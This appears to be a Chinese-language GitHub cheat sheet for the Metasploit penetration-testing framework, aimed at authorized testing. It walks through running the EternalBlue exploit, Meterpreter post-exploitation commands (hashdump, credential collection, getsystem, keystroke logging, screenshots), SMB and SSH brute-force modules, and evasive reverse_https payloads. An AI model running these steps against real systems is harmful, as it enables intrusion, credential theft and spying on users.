kairos-ix/metasploit-cheatsheet

# Metasploit 速查表 一份使用 Metasploit 的实用参考指南。分为两部分——一部分适合初学者，另一部分适合已经掌握基础知识并想进一步深入学习的人。 不讲理论。没有废话。只有切实可用的命令。 ## 目录 - [新手指南](#beginner-guide) - [什么是 Metasploit？](#what-is-metasploit) - [启动 Metasploit](#starting-metasploit) - [你的前 5 个命令](#your-first-5-commands) - [理解模块选项](#understanding-module-options) - [基本工作流程](#basic-workflow) - [进阶参考](#pro-reference) - [会话管理](#session-management) - [Meterpreter 命令](#meterpreter-commands) - [实用的辅助模块](#useful-auxiliary-modules) - [高级技巧](#advanced-tips) - [法律声明](#legal-notice) ## 新手指南 ### 什么是 Metasploit？ Metasploit 是一个渗透测试框架。它为你提供了一套工具，用于查找和测试系统中的漏洞——其方式与攻击者相同，但是在可控且经授权的情况下进行的。 你在 Kali Linux（或任何 Linux 机器）上运行它。所有操作都在终端中进行。 ### 启动 Metasploit 打开你的终端并输入： ``` msfconsole ``` 就是这样。它会加载并显示如下的提示符： ``` msf6 > ``` 这就是你输入所有命令的地方。 ### 你的前 5 个命令 这些是你一开始唯一需要知道的命令。 **1. 搜索模块** ``` search ``` 示例——搜索 SMB 漏洞： ``` search eternalblue ``` 这会显示一个匹配模块的列表。每个模块都有名称、排名和描述。 **2. 选择模块** ``` use ``` 示例： ``` use exploit/windows/smb/ms17_010_eternalblue ``` 执行此操作后，你的提示符将更改为显示该模块的名称。这就意味着它已被选中。 **3. 查看模块需求** ``` show options ``` 这会显示该模块所需的所有设置。在 `Required` 下标记为 `yes` 的任何内容，在运行 exploit 之前都必须填写。 **4. 设置值** ``` set ``` 你需要设置的两个最常见的参数是目标 IP 和你自己的 IP： ``` set RHOST 192.168.1.10 set LHOST 192.168.1.5 ``` - **RHOST** = 目标机器的 IP 地址 - **LHOST** = 你自己机器的 IP 地址 **5. 运行 exploit** ``` exploit ``` 或者使用 `run` —— 两者的作用相同。 ### 理解模块选项 当你运行 `show options` 时，你会看到一个表格。以下是每一列的含义： | 选项 | 含义 | | --- | --- | | `LHOST` | 你的 IP 地址（你的 Kali 机器） | | `LPORT` | 你的端口（连接返回给你的端口） | | `RHOST` | 目标的 IP 地址 | | `RPORT` | 目标的端口（通常已预填） | | `PAYLOAD` | exploit 成功后在目标上运行的代码 | 在大多数情况下，你只需要设置 `RHOST` 和 `LHOST`。其余的通常已经预填好了。 ### 基本工作流程 每次都按照以下步骤操作： ``` 1. msfconsole Start Metasploit 2. search Find the right module 3. use Select it 4. show options See what needs to be set 5. set RHOST Set the target 6. set LHOST Set your machine 7. set PAYLOAD Set payload if needed 8. exploit Run it ``` ## 进阶参考 ### 会话管理 当 exploit 成功时，Metasploit 会打开一个 **session** —— 与目标机器的连接。你可以同时管理多个 session。 | 命令 | 作用 | | --- | --- | | `sessions` | 列出所有活动的 session | | `sessions -i ` | 通过 ID 连接到某个 session | | `sessions -k ` | 终止指定的 session | | `sessions -K` | 终止所有 session | | `background` | 将当前 session 发送到后台 | | `sessions -u ` | 将 shell session 升级为 Meterpreter | ### Meterpreter 命令 Meterpreter 是一个在目标内存中运行的高级 shell。与普通 shell 相比，它为你提供了更多的控制权。 **系统信息** | 命令 | 作用 | | --- | --- | | `sysinfo` | 目标的 OS、主机名、架构 | | `getuid` | 你当前正在运行的用户身份 | | `getpid` | 你的 Meterpreter session 的进程 ID | | `ps` | 列出所有正在运行的进程 | **权限提升** | 命令 | 作用 | | --- | --- | | `getsystem` | 尝试提升至 SYSTEM/root 权限 | | `migrate ` | 迁移到另一个进程（更稳定，权限更高） | **文件操作** | 命令 | 作用 | | --- | --- | | `pwd` | 显示目标上的当前目录 | | `ls` | 列出当前目录下的文件 | | `cd ` | 切换目录 | | `upload ` | 上传文件到目标 | | `download ` | 从目标下载文件 | | `search -f ` | 在目标上搜索文件 | **凭据收集** | 命令 | 作用 | | --- | --- | | `hashdump` | 导出 NTLM 密码哈希 (Windows) | | `run post/multi/recon/local_exploit_suggester` | 查找本地权限提升路径 | | `run post/windows/gather/credentials/credential_collector` | 收集存储的凭据 | **其他实用命令** | 命令 | 作用 | | --- | --- | | `shell` | 切换到原生系统 shell | | `screenshot` | 截取目标屏幕 | | `keyscan_start` | 开始记录击键 | | `keyscan_dump` | 导出捕获的击键记录 | | `keyscan_stop` | 停止键盘记录器 | ### 实用的辅助模块 辅助模块不会对任何内容进行 exploit。它们用于扫描和侦察。 **端口扫描** ``` use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 22,80,443,445,3389 run ``` **SMB** ``` # 检测 SMB 版本 use auxiliary/scanner/smb/smb_version # 检查 MS17-010 (EternalBlue) 而不进行利用 use auxiliary/scanner/smb/smb_ms17_010 # 暴力破解 SMB 登录 use auxiliary/scanner/smb/smb_login ``` **SSH** ``` # 检测 SSH 版本 use auxiliary/scanner/ssh/ssh_version # 暴力破解 SSH 登录 use auxiliary/scanner/ssh/ssh_login ``` **HTTP** ``` # 检测 web server 版本 use auxiliary/scanner/http/http_version # 目录暴力破解 use auxiliary/scanner/http/dir_scanner ``` ### 高级技巧 **一次性设置多个主机** ``` set RHOSTS 192.168.1.1-254 set RHOSTS 192.168.1.0/24 ``` **使用能穿透防火墙的 payload** ``` set PAYLOAD windows/meterpreter/reverse_https ``` HTTPS payload 会混入正常流量中，不太容易被拦截。 **将你的 session 工作保存到数据库** ``` db_nmap -sV 192.168.1.0/24 ``` 这会运行 nmap 并将所有内容——开放端口、服务、版本——直接保存到 Metasploit 数据库中，以供日后参考。 **按 CVE 搜索** ``` search cve:2021-44228 ``` **在 exploit 之前检查目标是否存在漏洞** ``` check ``` 并非所有模块都支持此功能，但如果支持，请优先使用它——这样可以避免在目标上产生不必要的动静。 **添加新模块后重新加载所有模块** ``` reload_all ``` ## 法律声明 仅在你拥有或获得**书面授权**测试的系统上使用 Metasploit。 未经许可对系统运行 exploit 在大多数国家都是非法的，包括违反《计算机欺诈和滥用法》(美国)、《计算机滥用法》(英国) 以及其他地区的类似法律。 此仓库仅用于学习和授权测试。 ## 贡献 如果内容有误或已过时，请提交 issue 或发起 pull request。请保持实用性——只添加在实际实战中真正有用的内容。

标签：Web报告查看器, XXE攻击, 威胁模拟, 速查表, 防御加固